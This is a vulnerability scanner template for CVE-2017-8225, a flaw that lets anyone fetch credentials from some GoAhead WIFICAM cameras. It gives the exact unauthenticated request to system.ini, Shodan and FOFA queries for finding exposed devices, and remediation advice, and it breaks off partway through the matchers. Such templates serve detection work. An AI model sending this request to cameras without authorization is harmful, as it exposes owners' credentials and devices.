id: CVE-2017-8225 info: name: GoAhead Camera - Credential Disclosure author: K3ysTr0K3R severity: critical description: | GoAhead camera credential disclosure vulnerability in system.ini. The vulnerability affects certain Wireless IP Camera (P2P) WIFICAM devices and allows unauthenticated remote attackers to access the system.ini configuration file through a crafted HTTP request. The exposed configuration may contain sensitive authentication credentials, including usernames and passwords. impact: | Successful exploitation can disclose camera authentication credentials to an unauthenticated remote attacker, potentially allowing unauthorized access to the affected device. remediation: | Update affected camera firmware to the latest available version. Where firmware updates are unavailable, restrict access to the camera's HTTP interface and avoid exposing the device directly to untrusted networks. reference: - https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225 classification: cve-id: CVE-2017-8225 epss-score: 0.35359 epss-percentile: 0.98339 cwe-id: CWE-200 cvss-score: 9.8 metadata: verified: true max-request: 1 shodan-query: "GoAhead-Webs" fofa-query: "GoAhead-Webs" tags: cve,cve2017,goahead,credentials,camera,vkev http: - method: GET path: - "{{BaseURL}}/system.ini?loginuse&loginpas" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "